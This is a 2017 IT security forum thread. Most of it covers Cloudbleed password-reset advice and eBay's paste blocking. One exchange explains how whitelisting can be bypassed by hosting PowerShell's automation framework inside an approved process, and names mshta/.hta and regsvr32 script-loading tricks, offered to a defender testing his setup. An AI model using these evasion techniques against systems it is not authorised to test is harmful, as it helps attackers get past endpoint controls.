|
My inbox volume was fairly high this morning with staff asking which passwords they should change. I'm probably three emails away from replying with because I'm not psychic and I don't actually know or care which sites you have accounts on.
|
# ? Feb 24, 2017 17:22 |
|
|
# ? May 10, 2024 09:26 |
|
Within my organisation, we use an application white-listing product (Appsense Application Manager) on all Windows endpoints. We only allow pre-approved applications and block scripting engines like cscript.exe, powershell.exe etc. We do not allow executables to run from anywhere in the user's profile, network drives etcetera. We haven't had a single malware infection (well, as far as we know) since implementing white-listing, and are generally pretty pleased with it. We recently had a sales meeting with a security vendor. They told us that app-whitelisting technologies were now ineffective, because new toolkits such as 'PowerShell Empire' can execute on a system without needing an actual .exe file to be written to the file system and then executed somehow. I am trying to understand how accurate this statement is. I've read various bits about PowerShell Empire and the different staging methods, such as DLL injection, but they all seem to rely on powershell.exe or at least some sort of executable running at some point. Can someone help me understand this? My background is in general IT ops, so apologies if I have misunderstood anything.
|
# ? Feb 24, 2017 17:58 |
|
Telling people 'you should change every password you have' seems like a great way to make them go 'eh why bother' and not change anything.
|
# ? Feb 24, 2017 19:19 |
|
skull mask mcgee posted:I mean, it is Friday morning. This is a vodka day. Tuesdays are for whiskey.
|
# ? Feb 24, 2017 19:24 |
|
vOv posted:Telling people 'you should change every password you have' seems like a great way to make them go 'eh why bother' and not change anything. So you would advise what? "here's a list of a million-plus domains. Figure out which ones you use" Seriously, everyone should be changing all their passwords and implementing 2FA on sites that support it. If they don't want to, that's on them.
|
# ? Feb 24, 2017 19:27 |
|
I think that "resetting all of your passwords" is overkill given the fact that the chance of this having been exploited in the past 6 months is low, the "good guys" found the issue, and CloudFlare have been working with search vendors to clear their relevant caches. I informed my users to reset their most sensitive accounts and to keep an eye on their bank statements, but until I see something that indicates this is being exploited it is more of a "reset your sensitive passwords when you have a moment" rather than "stop what you are doing and reset every password you have." Company-wise, we do not have any services that use CloudFlare that we are aware of, but obviously we are still researching that. [Edit: Like yeah, I get it, a full reset is the correct way of handling this. But back in the real world, the universe does not revolve around IT security. Add in the fact that theoretically speaking, some of the data that was leaked includes problematic info that isn't username and passwords that we can't clean up after, it is what is it is.]
|
# ? Feb 24, 2017 19:32 |
|
*Eyes notebook with 28 pages of written down random passwords with trepidation*
|
# ? Feb 24, 2017 20:33 |
|
Internet Explorer posted:I think that "resetting all of your passwords" is overkill given the fact that the chance of this having been exploited in the past 6 months is low, the "good guys" found the issue, and CloudFlare have been working with search vendors to clear their relevant caches. I informed my users to reset their most sensitive accounts and to keep an eye on their bank statements, but until I see something that indicates this is being exploited it is more of a "reset your sensitive passwords when you have a moment" rather than "stop what you are doing and reset every password you have." I definitely see what you're saying and mostly agree. I still think it's a good idea to encourage everyone reset their passwords after this, if for no other reason than encouraging the practice. It's good to get people in the habit of being aware what passwords they have where, and when the last time was they reset it. This is also a good chance to encourage two-factor. None of this addresses the fact that the biggest/worst part of this leak was the traffic compromise part, it's not like someone hacked into a password database. The sheer scope of this is awesome imo, this kind of incident turns my crank in the morning
|
# ? Feb 24, 2017 20:42 |
|
vOv posted:Telling people 'you should change every password you have' seems like a great way to make them go 'eh why bother' and not change anything. "Change every password you have, starting with the most important ones, until you get bored"
|
# ? Feb 24, 2017 20:55 |
|
Cup Runneth Over posted:"Change every password you have, starting with the most important ones, until you get bored" Yeah, basically. I think it's reasonable to reset maybe your 5 most important passwords (bank, e-mail, secret ADTRW account) but I have maybe 40 passwords that'd be affected by this and some of them I'd have to re-type on my phone and I don't reuse passwords anyway. I don't want to spend literally an hour on this.
|
# ? Feb 24, 2017 21:00 |
|
Cup Runneth Over posted:"Change every password you have, starting with the most important ones, until you get bored" 0 passwords later "OK I guess I'm good to go! "
|
# ? Feb 24, 2017 21:10 |
|
Volmarias posted:0 passwords later If users are determined to be stupid, what can you do to prevent them from compromising themselves? They will just tell someone their password when emailed about it anyway.
|
# ? Feb 24, 2017 21:15 |
|
Authy is on the list. I use Authy but always via the Android app and not over HTTP. Do I need to regenerate my master key thingy again?
|
# ? Feb 24, 2017 21:31 |
|
Cup Runneth Over posted:If users are determined to be stupid, what can you do to prevent them from compromising themselves? They will just tell someone their password when emailed about it anyway. Is it not stupid to stop when bored of the process, as you proposed? How far do you have to go in the list to be smart, if not to the end? apropos man posted:Authy is on the list. I use Authy but always via the Android app and not over HTTP. Do I need to regenerate my master key thingy again? Does the app not use HTTP?
|
# ? Feb 24, 2017 21:32 |
|
apropos man posted:Authy is on the list. I use Authy but always via the Android app and not over HTTP. Do I need to regenerate my master key thingy again? I promise you the app also uses http/s
|
# ? Feb 24, 2017 21:33 |
|
Cool. Cheers folks.
|
# ? Feb 24, 2017 21:40 |
|
Subjunctive posted:Is it not stupid to stop when bored of the process, as you proposed? How far do you have to go in the list to be smart, if not to the end? Fair enough. If you don't consider any of your accounts important enough to take action to protect them, that doesn't necessarily make you stupid.
|
# ? Feb 24, 2017 21:46 |
|
Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery? I think that this is more of a "our password hashes (or worse, plaintext) passwords were all leaked" scenario where that sort of sledgehammer approach would apply. Or once logged in the users would be encouraged or forced to change their passwords.
|
# ? Feb 24, 2017 22:39 |
|
Three-Phase posted:Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery? I hope so.
|
# ? Feb 24, 2017 22:50 |
|
Three-Phase posted:Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery? Agree with ^^^, I definitely hope this happens.
|
# ? Feb 24, 2017 22:53 |
|
gallop w/a boner posted:. This will help: https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/ To summarize : At PowerShell's core is an implementation of System.Management.Automation C# framework. By making a new C# exe with access and run commands on that framework it is a gimped version (no threading and slow as poo poo) of PowerShell but PowerShell nevertheless. Then you hide this gimped PowerShell into a new whitelisted process and that is your stager.
|
# ? Feb 24, 2017 22:55 |
|
Subjunctive posted:I hope so. But do you expect it to happen?
|
# ? Feb 24, 2017 23:08 |
|
I highly doubt it unless we start seeing accounts being breached.
|
# ? Feb 24, 2017 23:17 |
|
Three-Phase posted:But do you expect it to happen? Internet Explorer posted:I highly doubt it unless we start seeing accounts being breached. Any responsible website would enforce a password reset on their users or at the very least advise them to do so.
|
# ? Feb 24, 2017 23:21 |
|
OSI bean dip posted:Any responsible website would enforce a password reset on their users or at the very least advise them to do so. Can you post a running list of these responsible websites as they enforce password resets?
|
# ? Feb 24, 2017 23:42 |
|
Three-Phase posted:Question: because of Cloudbleed, do you guys foresee a lot of (or even any) companies doing forced password resets? As in a company kills everyone's password and forces them to do a password recovery? If you use something like LastPass, it has a feature to automatically change the password on the services supporting it.
|
# ? Feb 24, 2017 23:46 |
|
Internet Explorer posted:Can you post a running list of these responsible websites as they enforce password resets? No. I have better things to do. If someone feels like the risk isn't there to warrant a forced password reset at the very least they should recommend it.
|
# ? Feb 25, 2017 00:41 |
|
sarehu posted:Don't roll your crypto and don't use Cloudflare either. Also: Don't upload a pair of files with identical SHA-1 to a SVN repository, turns out this corrupts them.
|
# ? Feb 25, 2017 00:56 |
|
Kassad posted:Also: Don't upload a pair of files with identical SHA-1 to a SVN repository, turns out this corrupts them.
|
# ? Feb 25, 2017 01:25 |
|
gallop w/a boner posted:Within my organisation, we use an application white-listing product (Appsense Application Manager) on all Windows endpoints. We only allow pre-approved applications and block scripting engines like cscript.exe, powershell.exe etc. We do not allow executables to run from anywhere in the user's profile, network drives etcetera. We haven't had a single malware infection (well, as far as we know) since implementing white-listing, and are generally pretty pleased with it. With app white listing and scripting disabled, you've hit all the low hanging fruit. Outside of remote exploitation, the goal should be to keep the user from infecting themselves. Look up mshta or .hta file attacks, there's a great article on abusing regsvr32 to load vbs from back in January-ish. Both attacks don't depend on using cscript or wscript. But again, these haven't been seen yet lately in the usual mass Mal malware campaigns. Take care of the low hanging fruit and you're mostly set.
|
# ? Feb 25, 2017 01:49 |
|
So I just spent the last couple of hours changing passwords due to cloudbleed. I even changed some that weren't on the vulnerable list just because. I noticed that ebay have disabled copy and paste in the browser, which is more likely to force people to choose a simple password over a random, complicated one that can be generated and pasted by keepass or whatever. Great thinking, ebay.
|
# ? Feb 25, 2017 09:10 |
|
apropos man posted:I noticed that ebay have disabled copy and paste in the browser edit: it seems that ublock origin is blocking the .js Ebay use in this case Mr Chips fucked around with this message at 09:30 on Feb 25, 2017 |
# ? Feb 25, 2017 09:27 |
|
Mr Chips posted:Have they? I was just able to log into ebay by pasting the password, with Chrome on Win10x64 I can copy and paste to login. It's changing the password that requires typing every character. Even with Ublock disabled.
|
# ? Feb 25, 2017 09:34 |
|
https://github.com/weltan/cloudbleed-1password a smart guy made a nodejs app that checks 1Password URLs for vulnerable domains. Docker container available for those who don't want to install nodejs. (obviously do not export your passwords into a .csv, only export the URLs)
|
# ? Feb 25, 2017 09:51 |
|
apropos man posted:I can copy and paste to login. It's changing the password that requires typing every character. Even with Ublock disabled. Did you by chance tweet at twitter support about this because I literally just read a twitter thread about this exact issue.
|
# ? Feb 25, 2017 10:43 |
|
skull mask mcgee posted:Did you by chance tweet at twitter support about this because I literally just read a twitter thread about this exact issue. Nope. I stopped tweeting a coupla years ago.
|
# ? Feb 26, 2017 02:58 |
|
It's so easy to gently caress up a copy/pasted password so making you type it makes a lot of sense.
|
# ? Feb 26, 2017 03:17 |
|
sarehu posted:It's so easy to gently caress up a copy/pasted password so making you type it makes a lot of sense. Yeah. No. There is no reason for eBay to be blocking this other than idiocy. If there is a concern over someone mistakenly loving up the copy and paste of a password then why are you making users do that in the first place?
|
# ? Feb 26, 2017 03:32 |
|
sarehu posted:It's so easy to gently caress up a copy/pasted password so making you type it makes a lot of sense. Lol this is a bad opinion. This explicitly blocks password managers, and if somebody fucks up a copy and paste there is a "forgot password" option. Blocking copy and paste is bad and dumb and doesn't do anything for security. In fact it actively hurts it.
|
# ? Feb 26, 2017 03:50 |
|
|
# ? May 10, 2024 09:26 |
|
ratbert90 posted:Lol this is a bad opinion. This explicitly blocks password managers, and if somebody fucks up a copy and paste there is a "forgot password" option. I feel like you missed a joke or something?
|
# ? Feb 26, 2017 03:55 |